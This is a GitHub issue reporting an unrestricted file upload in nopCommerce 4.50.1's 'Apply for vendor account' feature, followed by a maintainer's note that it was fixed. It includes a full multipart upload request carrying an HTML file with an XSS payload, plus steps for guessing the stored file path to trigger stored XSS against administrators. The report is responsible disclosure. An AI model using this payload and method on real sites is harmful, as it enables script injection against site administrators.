Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unrestricted File Upload in Apply for vendor account feature #6192

Closed
trungtin1998 opened this issue Mar 20, 2022 · 1 comment
Closed

Unrestricted File Upload in Apply for vendor account feature #6192

trungtin1998 opened this issue Mar 20, 2022 · 1 comment
Assignees
Labels
Milestone

Comments

@trungtin1998
Copy link

nopCommerce version: 4.50.1

Steps to reproduce the problem:

  • At Apply for vendor account feature, customer could upload arbitrary file, for example file script.html and content of submitted form as below:
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Name"

pentester
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Email"

phamtrungtintf1512@gmail.com
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Description"

Unrestricted File Upload in Apply for vendor account feature
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="uploadedFile"; filename="script.html"
Content-Type: text/html

<h1>Testing upload file by TF1T<img src=x onerror=alert(document.domain)></h1>
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="apply-vendor"


-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="__RequestVerificationToken"

CfDJ8PCrMQQMCTdOtvWnrq2WpITJLfTjickNjSm_qcSluUiK-_7c-VbzzTCok-M1duwMopvVKCMTy1GmrmTtQnch6SHfSXemzptzz2nOOP8uW4X6qGD2Z-1lPLct2WQrWDBY1qV5aGgzwe2T_2BneJo-5FzzMeW1b0o9epdkZ_hZpu-4UqN6zwTaxYTx-gFvJBoFaw
-----------------------------353170076619137176562598160618--
  • After admin see Vendor apply info by clicking Edit button, uploaded file will be generated and the final uploaded file has formatted /images/thumbs/{id-Vendor.Name-100.Content-Type-extension}
    vendor_list
    • id parameter is 7 digits number and it is auto increment, therefore it is easy to guess/bruteforce
    • User Input Vendor.Name will be filtered special character, therefore, I just put alphabet characters here to make output unchange
    • Content-Type is text/html => Content-Type-extension is html.
  • One of my final uploaded file is https://IP/images/thumbs/0000108_pentester_100.html
    Impact: Unrestricted File Upload in Apply for vendor account feature leading to Stored XSS
    Unrestricted_file_upload-vendor_apply_XSS
@skoshelev
Copy link
Contributor

Hi @trungtin1998. Thank you for your help. We fixed this issue by this commit

Closed #6192

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

3 participants